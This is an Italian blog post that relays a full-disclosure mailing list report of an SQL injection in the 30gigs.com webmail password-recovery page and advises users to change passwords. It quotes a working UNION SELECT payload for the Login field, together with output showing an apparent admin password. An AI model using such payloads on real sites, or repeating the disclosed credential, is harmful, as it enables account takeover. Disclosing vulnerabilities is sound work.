E' stata trovata da cumhur onat una sql injection che permette di trovare la password di un utente arbitrario tramite la pagina di login del servizio mail 30gigs.com.
Se avete account su 30gigs.com conviene cambiare password di frequente in questi giorni, fino a quando il problema sara' fixato.
Cos'e' 30gigs.com? trovate una recensione qui (su downloadblog.it)
http://www.downloadblog.it/post/509/30gigscom-webmail-gratis-da-30-gigabyte
Mail delle 14.16 giuta su fd (full-disclosure@lists.grok.org.uk)
cumhur onat wrote:
> I found a sql injection vulnerability, which leads to password
> disclosure in 30gigs.com
> The vulnerability exists in http://www.30gigs.com/getpassword/ page due
> to lack of validation of user submitted data.
> Proof of Concept:
> enter http://www.30gigs.com/getpassword/
> and copy & paster this code in the Login field, finally submit the form.
>
> not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin
>
> it will give an output like below, in which "runsit" corresponds to the
> password of account "admin"
> We have sent the password for your not_existant' union select
> 1,1,1,1,1,UserPassword,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from users where
> userLogin='admin@30gigs.com
>
> The site has been notified about the vulnerability 2 weeks ago, but no
> response was taken.